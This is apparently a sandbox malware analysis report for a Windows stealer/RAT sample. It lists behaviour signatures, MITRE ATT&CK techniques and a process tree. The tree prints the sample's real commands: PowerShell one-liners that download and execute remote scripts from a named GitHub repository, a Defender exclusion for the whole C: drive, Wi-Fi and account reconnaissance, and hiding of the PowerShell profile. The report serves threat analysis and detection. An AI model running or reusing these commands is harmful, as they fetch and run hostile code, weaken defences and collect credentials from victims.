f072a76d02f68b5d50234d88a35f5c1c4df2549913e574aa17e7a22e9c7e577b

Analysis

max time kernel
139s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24/08/2024, 02:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe
Size

14.0MB
MD5

f3df756208598308ccc728d2a1651243
SHA1

ce93f221b9fcaa9315bffcd8d28c434e69ed0c64
SHA256

f072a76d02f68b5d50234d88a35f5c1c4df2549913e574aa17e7a22e9c7e577b
SHA512

7719375c360a8d6ee99b844a55b61e312343f75df5145200618fbb3006604b44cc5d1275b4d0217c74934ea8db11b430c9d5b616232de4aa724f7a0718486946
SSDEEP

196608:fsWQx346coeXYk8TmIhI0bQ+ko9gvK9aXFFT:f2x2oKZ8TmsI00+kzvfz

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	3324	powershell.exe
16	2608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3324	powershell.exe
2608	powershell.exe
1064	PowerShell.exe
3316	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2740	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1148	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1692	netsh.exe
1620	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4908	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4396	ipconfig.exe
4908	NETSTAT.EXE
1016	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2924	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3316	powershell.exe
2608	powershell.exe
3324	powershell.exe
1064	PowerShell.exe
1064	PowerShell.exe
3316	powershell.exe
2608	powershell.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	1064	PowerShell.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: 33	620	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	620	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe
Token: SeUndockPrivilege	3324	powershell.exe
Token: SeManageVolumePrivilege	3324	powershell.exe
Token: 33	3324	powershell.exe
Token: 34	3324	powershell.exe
Token: 35	3324	powershell.exe
Token: 36	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe
Token: SeUndockPrivilege	3324	powershell.exe
Token: SeManageVolumePrivilege	3324	powershell.exe
Token: 33	3324	powershell.exe
Token: 34	3324	powershell.exe
Token: 35	3324	powershell.exe
Token: 36	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 3900 wrote to memory of 3316	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	85
PID 3900 wrote to memory of 3316	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	85
PID 3900 wrote to memory of 3324	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	86
PID 3900 wrote to memory of 3324	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	86
PID 3900 wrote to memory of 2608	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	88
PID 3900 wrote to memory of 2608	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	88
PID 3900 wrote to memory of 2864	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	89
PID 3900 wrote to memory of 2864	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	89
PID 3900 wrote to memory of 1064	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	90
PID 3900 wrote to memory of 1064	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	90
PID 3900 wrote to memory of 684	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	91
PID 3900 wrote to memory of 684	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	91
PID 3900 wrote to memory of 3436	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	92
PID 3900 wrote to memory of 3436	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	92
PID 684 wrote to memory of 3928	684	cmd.exe	93
PID 684 wrote to memory of 3928	684	cmd.exe	93
PID 2608 wrote to memory of 3260	2608	powershell.exe	94
PID 2608 wrote to memory of 3260	2608	powershell.exe	94
PID 3900 wrote to memory of 2924	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	95
PID 3900 wrote to memory of 2924	3900	2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe	95
PID 3260 wrote to memory of 4380	3260	csc.exe	96
PID 3260 wrote to memory of 4380	3260	csc.exe	96
PID 3324 wrote to memory of 912	3324	powershell.exe	98
PID 3324 wrote to memory of 912	3324	powershell.exe	98
PID 912 wrote to memory of 1164	912	csc.exe	99
PID 912 wrote to memory of 1164	912	csc.exe	99
PID 3324 wrote to memory of 1692	3324	powershell.exe	102
PID 3324 wrote to memory of 1692	3324	powershell.exe	102
PID 3324 wrote to memory of 3636	3324	powershell.exe	105
PID 3324 wrote to memory of 3636	3324	powershell.exe	105
PID 3636 wrote to memory of 2892	3636	net.exe	106
PID 3636 wrote to memory of 2892	3636	net.exe	106
PID 3324 wrote to memory of 2740	3324	powershell.exe	107
PID 3324 wrote to memory of 2740	3324	powershell.exe	107
PID 3324 wrote to memory of 4308	3324	powershell.exe	108
PID 3324 wrote to memory of 4308	3324	powershell.exe	108
PID 3324 wrote to memory of 4828	3324	powershell.exe	109
PID 3324 wrote to memory of 4828	3324	powershell.exe	109
PID 4828 wrote to memory of 4236	4828	net.exe	110
PID 4828 wrote to memory of 4236	4828	net.exe	110
PID 3324 wrote to memory of 4396	3324	powershell.exe	111
PID 3324 wrote to memory of 4396	3324	powershell.exe	111
PID 3324 wrote to memory of 3484	3324	powershell.exe	112
PID 3324 wrote to memory of 3484	3324	powershell.exe	112
PID 3484 wrote to memory of 1976	3484	net.exe	113
PID 3484 wrote to memory of 1976	3484	net.exe	113
PID 3324 wrote to memory of 3284	3324	powershell.exe	114
PID 3324 wrote to memory of 3284	3324	powershell.exe	114
PID 3324 wrote to memory of 4908	3324	powershell.exe	115
PID 3324 wrote to memory of 4908	3324	powershell.exe	115
PID 3324 wrote to memory of 3228	3324	powershell.exe	116
PID 3324 wrote to memory of 3228	3324	powershell.exe	116
PID 3324 wrote to memory of 1016	3324	powershell.exe	117
PID 3324 wrote to memory of 1016	3324	powershell.exe	117
PID 3324 wrote to memory of 3496	3324	powershell.exe	118
PID 3324 wrote to memory of 3496	3324	powershell.exe	118
PID 3324 wrote to memory of 1148	3324	powershell.exe	119
PID 3324 wrote to memory of 1148	3324	powershell.exe	119
PID 3324 wrote to memory of 1620	3324	powershell.exe	120
PID 3324 wrote to memory of 1620	3324	powershell.exe	120

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3436	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-24_f3df756208598308ccc728d2a1651243_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3324
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\heqgxv2g\heqgxv2g.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:912
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB304.tmp" "c:\Users\Admin\AppData\Local\Temp\heqgxv2g\CSCE8DAB60AF0764C28A2F689E0DE1F9AE1.TMP"
      4⤵
      PID:1164
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1692
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2892
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2740
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4308
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:4236
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4396
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:3284
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4908
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:3228
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:1016
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3496
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:1148
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bansvk1u\bansvk1u.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1CB.tmp" "c:\Users\Admin\AppData\Local\Temp\bansvk1u\CSC4DDE922E5EE45DAA9BEC2D610A3F14A.TMP"
      4⤵
      PID:4380
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:2864
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1064
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:3928
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3436
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2924

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x424 0x508
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

